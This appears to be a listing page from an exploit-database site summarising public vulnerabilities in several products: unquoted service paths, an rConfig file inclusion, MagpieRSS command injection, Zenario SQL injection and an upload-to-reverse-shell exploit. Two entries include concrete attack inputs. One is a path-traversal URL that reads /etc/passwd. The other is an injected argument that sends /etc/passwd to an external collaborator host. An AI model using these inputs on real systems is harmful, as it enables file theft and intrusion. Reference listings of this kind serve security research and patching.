header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

eBeam education suite 2.5.0.9 – ‘eBeam Device Service’ Unquoted Service Path

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Realtek Wireless LAN Utility 700.1631 – ‘Realtek11nSU’ Unquoted Service Path

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

QNAP QVR Client 5.0.0.13230 – ‘QVRService’ Unquoted Service Path

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

rConfig 3.9.6 – ‘path’ Local File Inclusion (Authenticated)

rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path. ajaxGetFileByPath.php allows authenticated users to download any file on the server. The following steps can be carried out in duplicating this vulnerability: Login the rConfig application with your credentials and enter the following link to your browser: http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd

MagpieRSS 0.72 – ‘url’ Command Injection and Server Side Request Forgery

In MagpieRSS 0.72 on the /scripts/magpie_debug.php?url=testtest and /scripts/magpie_simple.php page, a command injection vulnerability exists in the RSS URL field when a https url is sent and the Parse RSS button is clicked. It is possible to read any file by sending a URL like 'https://zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net? --data '@/etc/passwd'. It is also possible to request internal pages like 127.0.0.1, however it is restricted to https requests only. The vulnerability occurs in the file /extlib/Snoopy.class.inc on line 660.

Zenario CMS 8.8.53370 – ‘id’ Blind SQL Injection

A Blind SQL Injection vulnerability was discovered in Zenario CMS 8.8.53370. An attacker can exploit this vulnerability by sending a malicious request to the server and using the 'id' parameter to inject malicious SQL code. This can be done by using the sqlmap tool to send a malicious request to the server.

Vembu BDR 4.2.0.1 U1 – Multiple Unquoted Service Paths

Vembu BDR 4.2.0.1 U1 is vulnerable to Unquoted Service Paths. This vulnerability allows an attacker to gain elevated privileges on the system. The vulnerable services are hsflowd, VembuBDR360Agent and VembuOffice365Agent. All of these services have their binary path set to an unquoted path, which allows an attacker to inject malicious code into the service.

Monitoring System (Dashboard) 1.0 – File Upload RCE (Authenticated)

This exploit allows an authenticated user to upload a malicious PHP shell to the server and execute it. The exploit is tested on Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34. The exploit requires the attacker to change the Target_IP, REV_IP, and REV_PORT to their own. The exploit then uses a requests session to login to the server, upload the malicious PHP shell, and execute it.

Monitoring System (Dashboard) 1.0 – ‘uname’ SQL Injection

SQL Injection vulnerability in Monitoring System (Dashboard) 1.0 allows an attacker to inject malicious SQL code into the 'uname' parameter of the login.php page. By exploiting this vulnerability, an attacker can gain access to the database and dump the contents of the database.

Nsasoft Hardware Software Inventory 1.6.4.0 – ‘multiple’ Denial of Service (PoC)

This vulnerability allows remote attackers to cause a denial of service (application crash) via a crafted input. An attacker must first obtain the target system, then send a malicious input to the vulnerable application in order to execute the attack. The specific flaw exists within the handling of the registration code. The issue lies in the lack of proper validation of user-supplied data, which can result in a stack-based buffer overflow. An attacker can leverage this vulnerability to execute arbitrary code in the context of the application.

Recent Exploits: